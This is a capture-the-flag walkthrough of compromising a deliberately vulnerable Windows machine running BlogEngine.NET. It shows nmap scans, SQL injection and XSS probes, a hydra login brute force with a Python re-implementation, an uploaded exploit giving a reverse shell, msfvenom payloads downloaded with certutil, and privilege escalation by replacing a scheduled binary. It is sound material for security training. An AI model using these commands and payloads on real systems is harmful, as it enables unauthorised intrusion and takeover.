[Task 1] Deploy the vulnerable Windows machine
- Deploy the machine and access its web server.
Port Scan
nmap -Pn <ip>
High port scan
nmap -p1000- -Pn <ip>
Service and OS scan
nmap -A -p 80,3389 <ip>
Vulnerability scan
nmap -p 80,3389 --script vuln <ip>
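The follow-up scans above hard-code the two ports found by the first scan. As an added example (not part of the original walkthrough), the script below parses nmap's grepable output (`-oG -`) and builds the `-p` argument for the targeted `-A` scan. The sample output embedded in it is constructed to resemble this machine (host 10.10.10.10 is a placeholder) and is not real scan data.

```python
import re
from collections import defaultdict

# Constructed sample of `nmap -Pn -oG -` output; the host and timings are
# made up, the port list mirrors what this walkthrough found (80 and 3389).
SAMPLE_GREPABLE = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -Pn -oG - 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 80/open/tcp//http//, 3389/open/tcp//ms-wbt-server//, 135/filtered/tcp//msrpc//\tIgnored State: filtered (997)
# Nmap done at Mon Jan  1 00:00:05 2024 -- 1 IP address (1 host up) scanned in 5.00 seconds
"""

# Grepable format: tab-separated fields, "Ports:" holds comma-separated entries
# of the form port/state/proto/owner/service/rpc/version.
HOST_FIELD = re.compile(r"^Host:\s*(\S+)")
PORT_FIELD = re.compile(r"Ports:\s*(.*?)(?:\t|$)")


def open_ports(grepable: str) -> dict:
    """Map host -> sorted list of (port, proto, service) reported as open."""
    result = defaultdict(list)
    for line in grepable.splitlines():
        host = HOST_FIELD.match(line)
        ports = PORT_FIELD.search(line)
        if not host or not ports:
            continue  # comment lines and the "Status: Up" line carry no ports
        for entry in ports.group(1).split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue
            port, state, proto, _owner, service = fields[:5]
            if state == "open":
                result[host.group(1)].append((int(port), proto, service))
    return {h: sorted(p) for h, p in result.items()}


def port_arg(ports) -> str:
    """Turn [(80, 'tcp', 'http'), ...] into the '80,3389' form nmap -p expects."""
    return ",".join(str(p) for p, _, _ in sorted(ports))


def followup_scan(host: str, ports) -> list:
    """Argument vector for the service/OS scan restricted to the open ports."""
    return ["nmap", "-A", "-Pn", "-p", port_arg(ports), host]


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GREPABLE).items():
        print(host, ports)
        print(" ".join(followup_scan(host, ports)))
```

Feed it real output with `nmap -Pn -oG - <ip> | python3 parse_open.py` after replacing the embedded sample with `sys.stdin.read()`; filtered ports are deliberately dropped so the targeted scan only spends time on what actually answered.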
This machine is probably behind a filter or firewall: only the plain port scan returns useful results.
Conclusion:
There are 2 open ports:
Port 80: Microsoft IIS?
Port 3389: Microsoft Remote Desktop?
I guess it's a Windows machine, because port 3389 is most likely Remote Desktop Services.
2. What's the name of the clown displayed on the homepage?
Access HTTP site
[Task 2] Using Hydra to brute-force a login
- What request type is the Windows website login form using?
Let’s explore the site
Post section
Try SQL injection
1' or 1=1--+
SQL injection doesn't work.
Try XSS
<script>alert('XSS')</script>
XSS doesn't work either.
Archive section, not useful
Contact section
Try SQL injection
Seems like the form is not properly implemented.
Login section: this site uses BlogEngine.NET.
The default credential is admin:admin.
Let’s try it. Failed!!!
Let’s find other directory with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
I visited many of the discovered paths, but they show the same content as the other sections.
Let's check robots.txt; not much use either.
Since there are no other ways left, I'll have to brute-force the login with hydra.
Create user list first
echo admin > users.txt
echo pennywise >> users.txt
cat users.txt
Intercept login request w/ Burp Suite
It’s a POST request
2. Guess a username, choose a password wordlist and gain credentials to a user account!
Craft the hydra command: copy the intercepted request body and replace the username value with "^USER^" and the password value with "^PASS^".
Prepare hydra command
hydra -L <username list> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
Replace request
Run command
The credentials are admin:1qaz2wsx.
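What hydra's http-post-form module actually does is simple: substitute each candidate into the copied request body and treat any response that does not contain the F= failure string as a hit. As an added example (not part of the original walkthrough or of hydra), the script below reimplements that loop against a constructed local mock login page, so it runs offline; the mock accepts admin:1qaz2wsx (the pair found above) and answers everything else with a page containing "incorrect". The path /Account/login.aspx and the plain username/password field names are assumptions; against the real target the body template must come from the intercepted Burp request.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target: one valid pair, every other attempt
# gets a page containing the failure string "incorrect" (hydra's F=incorrect).
VALID = {"admin": "1qaz2wsx"}


class MockLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        ok = VALID.get(user) == password
        body = b"<h1>Welcome</h1>" if ok else b"<p>Login incorrect</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_mock_server():
    """Bind the mock on a free loopback port and serve it from a thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def post_form_bruteforce(url, users, passwords,
                         template="username=^USER^&password=^PASS^",
                         failure="incorrect"):
    """Mirror hydra http-post-form: ^USER^/^PASS^ are substituted into the
    body and a response lacking the failure string counts as success.
    Returns the first (user, password) that logs in, or None.
    (hydra -u changes the loop order to password-major; this is user-major.)"""
    for user in users:
        for pw in passwords:
            body = (template.replace("^USER^", urllib.parse.quote(user))
                            .replace("^PASS^", urllib.parse.quote(pw)))
            req = urllib.request.Request(
                url, data=body.encode(),
                headers={"Content-Type": "application/x-www-form-urlencoded"})
            with urllib.request.urlopen(req, timeout=5) as resp:
                page = resp.read().decode(errors="replace")
            if failure not in page:
                return user, pw
    return None


def demo():
    """Run the brute force against the local mock and return the hit."""
    srv = start_mock_server()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/Account/login.aspx"
        users = ["admin", "pennywise"]                       # same list as users.txt
        passwords = ["password", "123456", "1qaz2wsx", "letmein"]  # constructed mini wordlist
        return post_form_bruteforce(url, users, passwords)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The failure-string check is the weak point of this approach: if the real application returns "incorrect" on success too (or a redirect with no body), every attempt is misclassified, so verify the strings against one known-bad and, once found, one known-good login before trusting the result.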
[Task 3] Compromise the machine
- Now you have logged into the website, are you able to identify the version of the BlogEngine?
In the About section, BlogEngine is version 3.3.6.0.
2. Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
I can use searchsploit instead of searching the site.
searchsploit blogengine
Copy it
searchsploit -m 46353
Review the script
3. Using the public exploit, gain initial access to the server.
Who is the webserver running as?
Edit IP address and port no.
Save as PostView.ascx
Back to dashboard, click at Content -> Posts -> New
Click directory icon
Upload the script
Create listener
nc -lvp 1234
Access the uploaded script
http://<ip>/?theme=../../App_Data/files
Now I have a shell.
whoami
[Task 4] Windows Privilege Escalation
- Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.
Reference: https://netsec.ws/?p=331
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Create HTTP Server
python -m SimpleHTTPServer 80 (Python 2; on Python 3 use python3 -m http.server 80)
Back to victim’s machine, download file
cd \Windows\Temp
certutil -urlcache -f http://<ip>/shell.exe shell.exe
dir
I also download winPEAS.exe in case I need it later.
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
Back to attacker’s machine, set up metasploit handler
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST <Remote IP> (not actually needed: multi/handler only listens, so LHOST and LPORT are enough)
set LHOST <Local IP>
set LPORT <Local Port>
run
Back to victim’s machine, run shell.exe
shell.exe
Back to attacker’s machine, now I have a shell.
2. What is the OS version of this windows machine?
sysinfo
3. What is the name of the abnormal service running?
Try to escalate privilege
getsystem
Seems like this method doesn't work.
run post/multi/recon/local_exploit_suggester
I’ll try to run these exploits.
background
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
Failed!!!
I tried the other suggested exploits too, but every one of them failed. I have to find another way.
4. What is the name of the binary you're supposed to exploit?
I need to run WinPEAS.
shell
winPEAS.exe
It throws errors, so I need a simpler script: winPEAS.bat.
Download winPEAS.bat
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat
winPEAS.bat
5. Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?
cd Program Files (x86)
cd SystemScheduler
dir
cd Events
dir
Read the log file
type 20198415519.INI_LOG.txt
The log shows Message.exe being run as Administrator.
Copy Message.exe as a backup in case I screw up.
cd ..
copy Message.exe Message_bak.exe
I need to replace Message.exe with malicious file.
Back to attacker’s machine, create another shell file.
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
Create listener
nc -lvp 1236
Download Message.exe
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe
Back to attacker’s machine at port no.1236 listener, wait for a moment
whoami
Seems like whoami is not available in this shell.
Run the whoami alternative
echo %username%
I'm Administrator.
cd \Users\jeff\Desktop
dir
type user.txt
6. What is the root flag?
cd \Users\Administrator\Desktop
type root.txt